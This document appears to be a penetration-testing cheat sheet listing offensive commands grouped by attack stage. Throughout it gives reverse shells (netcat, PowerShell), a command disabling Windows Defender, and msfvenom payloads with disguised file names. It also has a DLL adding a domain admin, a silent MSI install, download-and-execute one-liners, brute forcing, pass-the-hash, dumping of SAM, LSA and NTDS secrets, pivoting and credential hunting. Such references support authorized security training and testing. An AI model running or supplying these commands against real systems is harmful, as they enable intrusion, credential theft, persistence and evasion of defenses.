Payloads & Shells
Netcat
sudo nc -lvnp <port>
nc -nv <ip> <port>
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <ip> <port> > /tmp/f
PowerShell Reverse Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
msfvenom — Stageless Payloads
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho
msfvenom — Staged Payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=8443 -f exe > maintenanceservice.exe
msfvenom — Web Shells
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
msfvenom — DLL
msfvenom -p windows/x64/exec cmd='net group "domain admins" <user> /add /domain' -f dll -o adduser.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=8080 -f dll > backupscript.dll
msfvenom — MSI
msfvenom -p windows/shell_reverse_tcp lhost=<ip> lport=<port> -f msi > shell.msi
msiexec /i shell.msi /quiet /qn /norestart
Metasploit Modules
use exploit/windows/smb/psexec
use exploit/windows/smb/ms17_010_psexec
use auxiliary/scanner/smb/smb_ms17_010
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
shell
Webshell Locations (Kali / Pwnbox)
/usr/share/webshells/laudanum
/usr/share/nishang/Antak-WebShell
Shell Spawning
python3 -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
lua -e 'os.execute("/bin/sh")'
awk 'BEGIN {system("/bin/sh")}'
find / -name <file> -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
vim -c ':!/bin/sh'
TTY Upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell, then run the next line from the local terminal
stty raw -echo; fg
export TERM=xterm
File Transfers
sudo python3 -m http.server 8001
IEX(New-Object Net.WebClient).downloadString('http://<ip>/shell.exe')
impacket-smbserver -ip <ip> -smb2support -username <user> -password <password> shared /home/<user>/Downloads/
sudo python3 smbserver.py -smb2support CompData /home/<user>/Documents/
certutil.exe -urlcache -split -f http://<ip>:8080/shell.bat shell.bat
Password Wordlist Generation
cewl https://<target> -d 4 -m 6 --lowercase -w wordlist.txt
hashcat --force password.list -r custom.rule --stdout > mut_password.list
./username-anarchy -i /path/to/names.txt
Brute Force — Remote Services
netexec winrm <ip> -u user.list -p password.list
netexec smb <ip> -u "<user>" -p "<password>" --shares
hydra -L user.list -P password.list <service>://<ip>
hydra -l <user> -P password.list <service>://<ip>
hydra -L user.list -p <password> <service>://<ip>
hydra -C <user_pass.list> ssh://<ip>
Pass-the-Hash
evil-winrm -i <ip> -u Administrator -H "<hash>"
netexec smb <ip> --local-auth -u <user> -p <password> --sam
netexec smb <ip> --local-auth -u <user> -p <password> --lsa
netexec smb <ip> -u <user> -p <password> --ntds
Pivoting
ssh -D 9050 <user>@<dmz_ip>
sudo vim /etc/proxychains.conf
# entry to add to /etc/proxychains.conf (matches the -D port above): socks4 127.0.0.1 9050
sudo proxychains -q nmap -sT -Pn <internal_ip> --open
proxychains xfreerdp /v:<internal_ip> /u:<user> /p:<password>
Network Packet Credential Extraction
./Pcredz -f demo.pcapng -t -v
Snaffler / SMB Share Hunting
snaffler.exe -s
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public